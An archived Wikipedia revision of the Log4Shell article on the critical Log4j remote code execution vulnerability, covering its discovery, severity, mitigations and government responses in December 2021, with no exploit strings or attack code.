Log4Shell

From Wikipedia, the free encyclopedia

This is an old revision of this page, as edited by Yeeno (talk | contribs) at 05:28, 13 December 2021 (Add impact in Canada). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

Log4Shell
CVE identifier(s)CVE-2021-44228
Date discovered24 November 2021; 2 years ago (2021-11-24)
Date patched6 December 2021; 2 years ago (2021-12-06)
DiscovererChen Zhaojun of the Alibaba Cloud Security Team[1]
Affected softwareApplications logging user input using Log4j

Log4Shell, also known by its CVE number CVE-2021-44228, is a zero-day arbitrary code execution vulnerability in popular Java logging framework Log4j.[2][3] The vulnerability was disclosed to Apache by Alibaba's Cloud Security Team on 24 November 2021 and published on 9 December 2021.[1][4][5]

The vulnerability takes advantage of Log4j not checking against LDAP and JNDI requests.[6][2][7] This allows attackers to execute arbitrary Java code on a server or other computer.[5] Affected services include Cloudflare, iCloud, the Java edition of Minecraft, and Steam.[6] Lunasec characterised the vulnerability as "a design failure of catastrophic proportions"[5] and Tenable as "the single biggest, most critical vulnerability of the last decade".[8] The Apache Software Foundation, which Log4j is a project of, gave Log4Shell a CVSS rating of 10, the highest available score.[9]

Background

Main article: Log4j

Log4j is an open source logging framework that allows software developers to log various data within their application. This data can also include user input.[10] It is used ubiquitously in Java applications, especially enterprise software.[5] Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation.[11]

Mitigation

Fixes for this vulnerability were released on December 6, 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1.[12] The fix included restricting the servers and protocols that may be used for lookups, which can be configured using several system properties. This replaced the system property log4j2.formatMsgNoLookups, which is recommended to be used to mitigate the vulnerability in previous versions by setting it to true.[13][7][9] Additionally, all features using JNDI, on which this vulnerability was based, will be disabled by default from version 2.15.1 onwards.[14]

Newer versions of the JRE also mitigate this vulnerability by blocking remote code from being loaded by default, though attack vectors still exist in certain applications.[2][15]

Response and impact

In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, termed the exploit "critical" and advised vendors to prioritize software updates,[16] and the Canadian Centre for Cyber Security (CCC) called on organisations to take on immediate action.[17] The analogous German agency Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at its highest threat level, calling it an "extremely critical threat situation" (translated). It has also reported that several attacks already were successful and that it is hard to assess the real impact of this situation.[18][19]

According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability.[20] The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4000 of its websites as a "preventative measure."[21]

System administrators were advised to assess the situation and put mitigations in place as quickly as possible, either by updating the library or disabling lookups using the system property.[22]

References

  1. ^ a b "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee. 10 December 2021. Retrieved 12 December 2021.
  2. ^ a b c "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". www.lunasec.io. 9 December 2021. Retrieved 12 December 2021.
  3. ^ "CVE - CVE-2021-44228". cve.mitre.org. Retrieved 12 December 2021.
  4. ^ "Worst Apache Log4j RCE Zero day Dropped on Internet". www.cyberkendra.com. 9 December 2021. Retrieved 12 December 2021.
  5. ^ a b c d Newman, Lily Hay. "'The Internet Is on Fire'". Wired. ISSN 1059-1028. Retrieved 12 December 2021.
  6. ^ a b "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". www.pcmag.com. Retrieved 12 December 2021.
  7. ^ a b Goodin, Dan (10 December 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica. Retrieved 12 December 2021.
  8. ^ Press, Associated (11 December 2021). "Recently uncovered software flaw 'most critical vulnerability of the last decade'". The Guardian. Retrieved 12 December 2021.
  9. ^ a b "Log4j – Apache Log4j Security Vulnerabilities". logging.apache.org. Retrieved 12 December 2021.
  10. ^ Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 December 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42. Palo Alto Networks.
  11. ^ "Log4j – Apache Log4j 2". logging.apache.org. Retrieved 12 December 2021.
  12. ^ "Restrict LDAP access via JNDI by rgoers - Pull Request #608 - apache/logging-log4j2". GitHub. 5 December 2021. Retrieved 12 December 2021.
  13. ^ "LOG4J2-3198: Log4j2 no longer formats lookups in messages by default". GitHub. 5 December 2021.
  14. ^ "LOG4J2-3208: Disable JNDI by default". issues.apache.org. 11 December 2021.
  15. ^ "Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes". Retrieved 12 December 2021.
  16. ^ "STATEMENT FROM CISA DIRECTOR EASTERLY ON "LOG4J" VULNERABILITY". CISA. 11 December 2021.
  17. ^ "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada. 12 December 2021.
  18. ^ "BSI warnt vor Sicherheitslücke". Tagesschau. 12 December 2021.
  19. ^ "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alarm: Log4Shell vulnerability causes extremely critical threat situation]. BSI press service (in German). 12 December 2021.
  20. ^ "Apache Log4j RCE Attempts". www.greynoise.io. Retrieved 12 December 2021.
  21. ^ "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News. 12 December 2021. Retrieved 12 December 2021.
  22. ^ "Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation". CISA. Retrieved 12 December 2021.

External links

Log4j website

Retrieved from "https://en.wikipedia.org/w/index.php?title=Log4Shell&oldid=1060054238"